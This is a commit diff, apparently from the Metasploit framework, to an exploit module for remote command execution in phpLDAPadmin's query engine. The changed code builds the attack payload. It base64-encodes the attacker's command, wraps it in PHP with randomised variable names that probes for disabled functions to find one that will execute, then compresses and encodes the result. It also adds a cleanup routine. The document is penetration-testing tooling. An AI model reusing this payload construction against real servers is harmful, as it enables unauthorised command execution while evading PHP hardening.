Handle payloads better, also add a cleanup routine specifically for php/exec

git-svn-id: file:///home/svn/framework3/trunk@14060 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/multi/http/phpldapadmin_query_engine.rb

@@ -15,6 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
 
 	include Msf::Exploit::Remote::HttpClient
+	include Msf::Payload::Php
 
 	def initialize(info = {})
 		super(update_info(info,
@@ -97,11 +98,27 @@ class Metasploit3 < Msf::Exploit::Remote
 		return res.headers['Set-Cookie']
 	end
 
+	def cleanup
+		# We may not be using php/exe again, so clear the CMD option
+		if datastore['CMD']
+			datastore['CMD'] = nil
+		end
+	end
+
 	def exploit
 		# if we are using the exec CMD stager
+		# important to check which php functions are disabled
 		if datastore['CMD']
-			p = "passthru(\"%s\");" % datastore['CMD']
+			cmd = Rex::Text.encode_base64(datastore['CMD'])
-			p = Rex::Text.encode_base64(p)
+			dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
+			out = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
+			shell = <<-END_OF_PHP_CODE
+			$c = base64_decode("#{cmd}");
+			#{php_preamble({:disabled_varname => dis})}
+			#{php_system_block({:cmd_varname=>"$c", :disabled_varname => dis, :output_varname => out})}
+			echo #{out};
+			END_OF_PHP_CODE
+			p = Rex::Text.encode_base64(Rex::Text.compress(shell))
 		else
 			p = Rex::Text.encode_base64(payload.encoded)
 		end